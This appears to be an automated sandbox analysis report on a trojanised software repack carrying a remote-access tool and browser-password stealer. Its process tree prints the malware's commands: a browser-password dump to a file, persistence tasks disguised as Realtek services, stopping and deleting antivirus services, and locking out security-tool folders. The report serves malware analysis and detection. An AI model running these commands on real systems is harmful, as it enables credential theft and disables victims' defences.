Malware Analysis Report

2024-11-13 16:21

Sample ID: 220520-dy81asffc3
Target: 69516cc15d5538556121c418b0645c6ff58da43ffeaabba875d874520f07bd50
SHA256: 69516cc15d5538556121c418b0645c6ff58da43ffeaabba875d874520f07bd50
Tags: rms aspackv2 discovery evasion persistence rat spyware stealer trojan upx
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V6
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral6
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral3
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral4
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral5
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10

SHA256: 69516cc15d5538556121c418b0645c6ff58da43ffeaabba875d874520f07bd50

Threat Level: Known bad

The file 69516cc15d5538556121c418b0645c6ff58da43ffeaabba875d874520f07bd50 was found to be: Known bad.

Malicious Activity Summary

rms aspackv2 discovery evasion persistence rat spyware stealer trojan upx

Modifies Windows Defender Real-time Protection settings

Windows security bypass

RMS

Nirsoft

ACProtect 1.3x - 1.4x DLL software

NirSoft WebBrowserPassView

Drops file in Drivers directory

Executes dropped EXE

Stops running service(s)

ASPack v2.12-2.42

Blocks application from running via registry modification

UPX packed file

Modifies Windows Firewall

Modifies file permissions

Reads user/profile data of web browsers

Loads dropped DLL

Checks computer location settings

Looks up external IP address via web service

Modifies WinLogon

Drops file in System32 directory

AutoIT Executable

Launches sc.exe

Drops file in Program Files directory

Enumerates physical storage devices

Runs .reg file with regedit

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of SetWindowsHookEx

Views/modifies file attributes

Delays execution with timeout.exe

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: LoadsDriver

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-05-20 03:26

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral6

Detonation Overview

Submitted

2022-05-20 03:26

Reported

2022-05-20 03:38

Platform

win10v2004-20220414-en

Max time kernel

150s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.exe

"C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.exe"

Network

Country Destination Domain Proto
IE 52.109.76.32:443 tcp
FR 2.18.109.224:443 tcp
FR 2.18.109.224:443 storesdk.dsx.mp.microsoft.com tcp
NL 40.126.32.69:443 tcp
US 20.189.173.1:443 tcp
NL 178.79.208.1:80 tcp
US 104.18.25.243:80 tcp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-05-20 03:26

Reported

2022-05-20 03:38

Platform

win7-20220414-en

Max time kernel

152s

Max time network

163s

Command Line

"C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan

RMS

trojan rat rms

Windows security bypass

evasion trojan

ACProtect 1.3x - 1.4x DLL software

Description Indicator Process Target
N/A N/A N/A N/A (2 identical rows)

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A (4 identical rows)

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A (4 identical rows)

ASPack v2.12-2.42

aspackv2

Description Indicator Process Target
N/A N/A N/A N/A (6 identical rows)

Blocks application from running via registry modification

evasion

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\SysWOW64\cmd.exe N/A

Modifies Windows Firewall

evasion

Stops running service(s)

evasion

UPX packed file

upx

Description Indicator Process Target
N/A N/A N/A N/A (2 identical rows)

Modifies file permissions

discovery

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A (37 identical rows)

Reads user/profile data of web browsers

spyware stealer

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Modifies WinLogon

persistence

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\ProgramData\Setup\update.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A (24 identical rows)

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\winmgmts:\localhost\root\CIMV2 C:\Programdata\RealtekHD\taskhost.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft JDX C:\ProgramData\Setup\update.exe N/A
File created C:\Program Files\Common Files\System\iediagcmd.exe C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\ByteFence C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\SpyHunter C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Enigma Software Group C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\AVG C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\360 C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Malwarebytes C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\COMODO C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\SpyHunter C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\AVAST Software C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\AVAST Software C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\AVG C:\ProgramData\Setup\update.exe N/A

Launches sc.exe

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\ProgramData\Windows\winit.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\ProgramData\Windows\winit.exe N/A

Delays execution with timeout.exe

evasion

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A (2 identical rows)

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database C:\ProgramData\Windows\winit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset C:\ProgramData\Windows\winit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage C:\ProgramData\Windows\winit.exe N/A

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A (2 identical rows)

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\ProgramData\Setup\update.exe N/A (5 identical rows)
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A (8 identical rows)
N/A N/A C:\ProgramData\Windows\winit.exe N/A (35 identical rows)
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A (6 identical rows)
N/A N/A C:\Programdata\Microsoft\rootsystem\1.exe N/A (5 identical rows)
N/A N/A C:\ProgramData\Microsoft\Intel\taskhost.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A (2 identical rows)
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeTcbPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A (2 identical rows)

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A (4 identical rows)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 380 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin (4 identical rows)
PID 380 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Repack.exe (4 identical rows)
PID 1988 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin C:\ProgramData\Setup\update.exe (7 identical rows)
PID 836 wrote to memory of 952 N/A C:\ProgramData\Setup\update.exe C:\ProgramData\Microsoft\Intel\wini.exe (4 identical rows)
PID 952 wrote to memory of 1816 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\WScript.exe (4 identical rows)
PID 952 wrote to memory of 268 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\ProgramData\Windows\winit.exe (4 identical rows)
PID 1816 wrote to memory of 1264 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe (7 identical rows)
PID 1264 wrote to memory of 928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe (4 identical rows)
PID 1264 wrote to memory of 1680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe (4 identical rows)
PID 1264 wrote to memory of 1092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe (4 identical rows)
PID 1264 wrote to memory of 1728 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe (4 identical rows)
PID 836 wrote to memory of 1536 N/A C:\ProgramData\Setup\update.exe C:\programdata\install\cheat.exe (4 identical rows)
PID 1264 wrote to memory of 1940 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe (4 identical rows)
PID 1536 wrote to memory of 1324 N/A C:\programdata\install\cheat.exe C:\ProgramData\Microsoft\Intel\taskhost.exe (4 identical rows)
PID 1264 wrote to memory of 924 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe (2 identical rows)

Views/modifies file attributes

evasion

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A (2 identical rows)

Processes

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe

"C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe"

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin -ptoptorrent

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Repack.exe

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Repack.exe

C:\ProgramData\Setup\update.exe

"C:\ProgramData\Setup\update.exe"

C:\ProgramData\Microsoft\Intel\wini.exe

C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"

C:\ProgramData\Windows\winit.exe

"C:\ProgramData\Windows\winit.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Programdata\Windows\install.bat" "

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg1.reg"

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg2.reg"

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /silentinstall

C:\programdata\install\cheat.exe

C:\programdata\install\cheat.exe -pnaxui

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /firewall

C:\ProgramData\Microsoft\Intel\taskhost.exe

"C:\ProgramData\Microsoft\Intel\taskhost.exe"

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /start

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST

C:\programdata\microsoft\intel\P.exe

C:\programdata\microsoft\intel\P.exe

C:\ProgramData\Windows\rutserv.exe

C:\ProgramData\Windows\rutserv.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Programdata\Microsoft\rootsystem\P.vbs"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appidsvc

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Programdata\Microsoft\rootsystem\1.exe /LoadPasswordsIE=1 /LoadPasswordsFirefox=1 /LoadPasswordsChrome=1 /LoadPasswordsOpera=1 /LoadPasswordsSafari=1 /LoadPasswordsSeaMonkey=1 /LoadPasswordsYandex=1 /stext Log.txt

C:\Windows\SysWOW64\sc.exe

sc start appidsvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appmgmt

C:\Programdata\Microsoft\rootsystem\1.exe

C:\Programdata\Microsoft\rootsystem\1.exe /LoadPasswordsIE=1 /LoadPasswordsFirefox=1 /LoadPasswordsChrome=1 /LoadPasswordsOpera=1 /LoadPasswordsSafari=1 /LoadPasswordsSeaMonkey=1 /LoadPasswordsYandex=1 /stext Log.txt

C:\Windows\SysWOW64\sc.exe

sc start appmgmt

C:\Windows\SysWOW64\sc.exe

sc config appidsvc start= auto

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows\*.*

C:\Windows\SysWOW64\sc.exe

sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows

C:\Windows\SysWOW64\sc.exe

sc config appmgmt start= auto

C:\Windows\SysWOW64\sc.exe

sc config RManService obj= LocalSystem type= interact type= own

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete swprv

C:\Windows\SysWOW64\sc.exe

sc config RManService DisplayName= "Microsoft Framework"

C:\Windows\SysWOW64\sc.exe

sc delete swprv

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop mbamservice

C:\Windows\SysWOW64\sc.exe

sc stop mbamservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop bytefenceservice

C:\Windows\SysWOW64\sc.exe

sc stop bytefenceservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete bytefenceservice

C:\Windows\SysWOW64\sc.exe

sc delete bytefenceservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete mbamservice

C:\Windows\SysWOW64\sc.exe

sc delete mbamservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete crmsvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

C:\Windows\SysWOW64\sc.exe

sc delete crmsvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-11232489401536740187-2110687217978207949628197400-1414867754528139644130986386"

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

cmd /c C:\Programdata\Install\del.bat

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny Admin:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny Admin:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)

C:\Windows\system32\taskeng.exe

taskeng.exe {0A6996F7-B6EF-467F-9861-8FD42E1E7481} S-1-5-21-1083475884-596052423-1669053738-1000:WYZSGDWS\Admin:Interactive:[1]

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)

C:\Programdata\RealtekHD\taskhost.exe

C:\Programdata\RealtekHD\taskhost.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

cmd /c C:\programdata\microsoft\temp\H.bat

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

C:\Windows\SysWOW64\icacls.exe

